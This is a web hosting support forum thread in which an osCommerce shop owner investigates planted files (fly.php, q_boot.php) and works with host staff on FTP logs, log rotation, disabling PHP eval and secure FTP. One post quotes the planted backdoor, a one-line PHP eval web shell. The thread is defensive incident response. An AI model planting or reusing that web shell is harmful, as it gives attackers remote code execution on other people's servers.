Site Hack!!

[backinaction]

Just this morning I found that every page on my OSC site that is running on EUK has a small google image attached to the bottom of it.

The link takes me too:
redirect.php?action=banner&goto=2

The image itself when cut and pasted by location states:
q_boot.php

All files were uploaded on the 10th of December. Another file on the root directory of my site is fly.php.

This suggests to me that I have been hacked via FTP rather than OScommerce and the fly.php script has been run to modify one of the .htaccess files.

Can anyone tell me how I can get a full log of all ftp log ins on the date in question from EUK as we didn't use FTP at all that day.

I would also like to block EVERY SINGLE IP address from accessing our FTP except for the only one we use, and perhaps the one our webmaster uses. Is this possible?

[eUK-Ralf]

Please contact our support team on Live Chat or place a ticket to support [@] eukhost.com. You may PM me the details of your account registered with us along with the domain name in issue, so that I may look into the issue and get it fixed to the earliest.

[Thomas]

Hi backinaction,

I have answered your questions below:

Can anyone tell me how I can get a full log of all ftp log ins on the date in question from EUK as we didn't use FTP at all that day.

You can check your FTP Logs under your cPanel with the Webalizer FTP option.

I would also like to block EVERY SINGLE IP address from accessing our FTP except for the only one we use, and perhaps the one our webmaster uses. Is this possible?

If you are on the Shared server then it wont be possible to block the FTP access of all other users, but if you are on a VPS, Semi-Dedicated or a Dedicated server then you can block the FTP access for all other IP's EXCEPT yours and your webmasters IP address.

Also check if you have allowed Anonymous FTP access to your website, you can also disable the anonymous FTP access on your website, To disable the anonymous FTP access you can just login to your cPanel and disable all the anonymous connections to your website through the Anonymous FTP option located under your cPanel.

[backinaction]

Many thanks. Got the FTP log via livechat. There is no other activity except our IP and our webmasters.

I need to check our webstats for that day but awstats doesn't give any option for viewing all IPs visiting our site on one specific day. It just throws up the entire month in one long list and no tab options for reordering.

[eUK-Ralf]

I need to check our webstats for that day but awstats doesn't give any option for viewing all IPs visiting our site on one specific day. It just throws up the entire month in one long list and no tab options for reordering.

• Login to your cPanel.
• Click on Awstat under section LOGS.
• You would have the screen to select the option for domain name statistics.
• Select the domain name.
• Under the statistics, click on (Unresolved IP Addresses).

This would give you the complete list of IP addresses visited to your website.

[backinaction]

I just don't understand how anyone can place files onto the root directory of our web site via OScommerce.

We had a file "fly.php" added onto the root on the 10th December.

Our web master told us that somebody accessed the banner manager in the OScommerce and added banners. Can anyone confirm if it's possible to do this without leaving any IP behind or not needing any kind of FTP access whatsoever.

[eUK-Ralf]

I just don't understand how anyone can place files onto the root directory of our web site via OScommerce.

We had a file "fly.php" added onto the root on the 10th December.

Our web master told us that somebody accessed the banner manager in the OScommerce and added banners. Can anyone confirm if it's possible to do this without leaving any IP behind or not needing any kind of FTP access whatsoever.

If you could help us with the details of your account, we will investigate the issue further.
Please contact our support team on Live Chat or place a ticket to support [@] eukhost.com. You may PM me the details of your account registered with us along with the domain name in issue, so that I may look into the issue.

[backinaction]

Hi,

I have PMd you. Could you please respond to this as soon as possible because there appears to be more to this than just a simple OSC hack.

[eUK-Ralf]

Hi,

I have PMd you. Could you please respond to this as soon as possible because there appears to be more to this than just a simple OSC hack.

Hi Rob,

We searched for the logs on the server for the upload of the fly.php file in your account however the logs have been rotated due to the log rotation cron set on the server. I advice you to keep your login credentials private and let the passwords be strong, so that hackers cannot crack, hunch or assume.

[backinaction]

"the logs have been rotated due to the log rotation cron set on the server"

Sounds painful. What does it mean?

My passwords have always been strong and secure. Running an OSC web site it goes without saying I would take the utmost protection when it comes to such measures.

However, I need to establish how the hackers have accessed my OScommerce site. As I posted a similar thread on the OSC forums and got a response (which I PMd) perhaps you colud clarify this for me.

The rogue script is running "test<?php @eval($_POST[code]);?>"

On a properly secure server eval functions are disabled. Why are they not on EUK servers?

[eUK-Ralf]

"the logs have been rotated due to the log rotation cron set on the server"

Sounds painful. What does it mean?

The auto-set cron runs on the server wherein the /var/logs have been updated, so the logs at the moment on the server do not have they details you requested.

My passwords have always been strong and secure. Running an OSC web site it goes without saying I would take the utmost protection when it comes to such measures.

It was just a suggestion to keep the passwords strong...

However, I need to establish how the hackers have accessed my OScommerce site. As I posted a similar thread on the OSC forums and got a response (which I PMd) perhaps you colud clarify this for me.

The rogue script is running "test<?php @eval($_POST[code]);?>"

On a properly secure server eval functions are disabled. Why are they not on EUK servers?

On a Shared Server there are multiple accounts hosted on the same server, so the different applications required by different owners to host and run their websites. CMS - Content Management System are required by many accounts hosted on the server to run websites which are using Joomla, wordpress, magento,xcart and etc.
It is not possible to disable the EVAL function of PHP on a Shared Server, as it is required by many hosting accounts using CMS applications.

If you wish to have it disable, you may consider any of the VPS Hosting Plans wherein you can have the complete administrative rights to your account. The VPS account is complete private to you and you have the complete rights to make changes to any files.

Click to view our Linux VPS Hosting Plans.

[backinaction]

The solution to almost every problem I have with EUK is nearly always answered with "Upgrade to our virtual servers." It does make me wonder what answer is given to people who have these virtual servers and encounter problems. The trump card having been played, what do you recommend they upgrade too then?

I do still require more clarification on these logs though. If I had logs of everyone who had accessed the site on the 10th, just 2 days ago, I could perhaps find out how these files got dropped there in the first place.

Are you saying all of these logs are deleted as a matter of course, or by accident, or what? I don't understand.

[NickJ]

The solution to almost every problem I have with EUK is nearly always answered with "Upgrade to our virtual servers." It does make me wonder what answer is given to people who have these virtual servers and encounter problems. The trump card having been played, what do you recommend they upgrade too then?

No, I don't agree with you.

As Ralf mentioned in his reply, most of the CMS based application require the "eval" function enabled under php configuration and its not possible to disable it globally on server.
If you wish, we can disable it for your domain on without any problem. But if you need it to be disabled server side, then you will need to consider a dedicated environment as its not possible under shared environment.

We do have our own security policies including web based firewall which conflicts with most of your(client hosted on the server) applications and we will have to provide you with the workaround for it. Suggestion for VPS is just a workaround.

I do still require more clarification on these logs though. If I had logs of everyone who had accessed the site on the 10th, just 2 days ago, I could perhaps find out how these files got dropped there in the first place.

Are you saying all of these logs are deleted as a matter of course, or by accident, or what? I don't understand.

We have FTP/cpanel logs for last 4 weeks for all accounts hosted on this server and I am not able to locate any instance where the file was uploaded via FTP or through cpanel under your account.

The other way to upload it is, through some script under your account and the logs for the same are saved under domlogs file. This domlog's file get rotated every day once the stats run. This is the reason why, we do not have the logs for the same.

You might be able to find the entry for the file under your domain's stats under 10th Dec stats.

[backinaction]

Thank you, Nick J for answering my question head on. This is the information I needed so I know how to proceed. Removing FTP and your own servers out of the equation I know where to focus my attention on security. This is what I've ben trying to establish all day.

Regarding, eval:-

"If you wish, we can disable it for your domain on without any problem."

Please can you, that would be great.

[NickJ]

Hello,

The "eval" function has been disabled for your domain..

[backinaction]

Thanks Nick, but we seem to have a new problem now.

We changed our FTP password login details the moment we had deleted all these rogue files. We looked at our ftp webalizer today and there is an IP address listed in Bejing that we have never seen before and know nothing about. They have accessed our site via FTP and uploaded files onto our server.

Our laptops have been thoroughly scanned with no traces of a virus. So how is it remotely possible they could have obtained our FTP login details????? We asked livehelp but they didn't know.

The only people with the new login details are ourselves. No-one, not even our web designers have the new details.

We have opened two tickets so far. One to have the site rolled back to a date in November and the other block China IP addresses from accessing our files. The rollback is the most important. Livechat were overly optomistic by telling us it would take half an hour, so if you have any idea on how and when it can be done please let me know.

[backinaction]

Okay now I'm confused.
Ronnie V at Livehelp told us we could block chinese IPs through FTP. He told us to open a ticket. We did and Max T told us we couldn't.

Yet again Livehelp proving they are the weakest link when it comes to EUK customer service.

That's why I have to keep using these forums, as livehelp are so bad.

It's been 2 hours since Livehelp told us they would rollback our site, even though they told us it would take half an hour. When we ask again why it hasn't been done they said "Our admin working on your issue". We can excuse the remedial English as it's par for the course with Livehelp, but why do they insist on giving timeframes that are a million miles short of the results.

[MaFtuk]

The solution to almost every problem I have with EUK is nearly always answered with "Upgrade to our virtual servers."

if you share a house with 5 other people it will keep costs down dramatically but with the downside being that you need to keep everybody happy, or at least the majority. likewise for servers - if you want it cheap then you go shared, if you want it exactly to your liking then get your own house (SD / D) or at least rent one (VPS)

MaFt

[sihost]

From my research over the last few months on security of our dedicated server (previously vps)

FTP
Standard ftp is insecure as it send logins and passwords in plain text, so however secure they are, they can be intercepted 'in transit' - and not forgetting, many users use their master cpanel passwords to access ftp. So once the ftp password and login is obtained by a 3rd party, they can log into your cpanel.
Much like sending your credit card details through an online shop without security.

FTP SSL
Sometimes called Explicit FTPS
This still uses port 21, but obtains a secure connection, so your login and password are encrypted, works well with Filezilla, not with some clients. Jailshell need not be turned on. This is best for those who want to access specific ftp folders set up in cpanel or main master password access. (Easier to explain to customers!)

SFTP SSH
The best and most secure, this sends the ftp transfer through a secure SSH connection, port 22 (or custom) but can only be used at root access to each account. (not ftp folders set up in cpanel) The port can also be moved to a non standard port to evade port scans. Dreamweaver supports this well by entering ftp.domain.comortnumber

In all cases, make your passwords very very secure and if you are a vps customer, or reseller with whm, enforce passwords to be 85% secure at least and turn on brute force protection, set the limits lower than default.

More related to this discussion, it doesn't look like the site was hacked through ftp, but I wonder if they gained cpanel access and uploaded through filemanager?

Or, its a php script with 777 permissions in a form with an upload button, or image upload. This depends if you are using suphp apache on your server though - if you are, this helps prevent this kind of activity.

Hope you get it sorted

[eUK-Victor]

Hello,

Yes, I agree with you.

The most important thing is the one should keep cPanel/FTP UserName passwords strong enough so that hackers cannot compromise them easily. Passwords should be a combination of alphanumeric characters and few special characters like ~ ! @ # $ % ^ & * { } + / , etc. and alos do keep changing passwords at regular intervals for security reasons.

Never keep the permissions of files/folders to world writable [777] unless its necessary so that no one can write into it.

Also taking a regular backup of your account from cPanel backup option is a good habit and it will be a great advantage in any disaster cases like account hack, hardware crash etc.

Regarding Shell access, we have few servers on which we do allow jail shell access and we always migrate the accounts of those clients who needs jail shell access.